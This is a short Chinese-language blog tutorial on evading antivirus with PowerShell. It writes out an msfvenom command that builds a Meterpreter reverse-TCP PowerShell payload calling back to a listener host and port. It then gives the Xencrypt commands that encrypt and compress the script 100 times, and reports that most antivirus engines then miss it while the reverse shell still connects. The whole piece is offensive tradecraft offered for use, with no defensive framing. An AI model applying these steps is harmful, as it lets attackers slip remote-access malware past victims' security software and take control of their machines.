powershell加密、压缩 免杀实战
2020-03-26 本文已影响0人
城市烈人
结合"PowerShell crypter"工具(下面用简称"crypter")来对powershell脚本进行加密并采用Gzip/DEFLATE来绕过杀软
1、msfvenom生成powershell 反弹马
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST= 192.168.81.253 LPORT=5555 -f psh-reflection > hackshark.ps1
data:image/s3,"s3://crabby-images/c1113/c11130389af677aec2ba156c28a4d72a656f4803" alt=""
通过检测,发现依然有很多家杀软报毒
data:image/s3,"s3://crabby-images/ad77c/ad77c7217db7fb1e1a53c74f99642391bb2b4c7c" alt=""
2、采用"crypter"加密、压缩处理ps反弹木马
在powershell终端中输入
Import-Module ./xencrypt.ps1
Invoke-Xencrypt -InFile .\hackshark.ps1 -OutFile hackhack.ps1 -Iterations 100
"-Iterations 100"是对脚本进行100次的加密与压缩
经过100加密、压缩后
data:image/s3,"s3://crabby-images/da9ae/da9ae220b0e7ad5241b96502b09c5e4c1d33fe6f" alt=""
已经实现大部分免杀了
data:image/s3,"s3://crabby-images/d56ba/d56ba5298d2efde9b2ad694b8a4dbf0287186baf" alt=""
也能成功反弹:
data:image/s3,"s3://crabby-images/eb9b4/eb9b48e3338c4f981b74660a05f0a128acae96bd" alt=""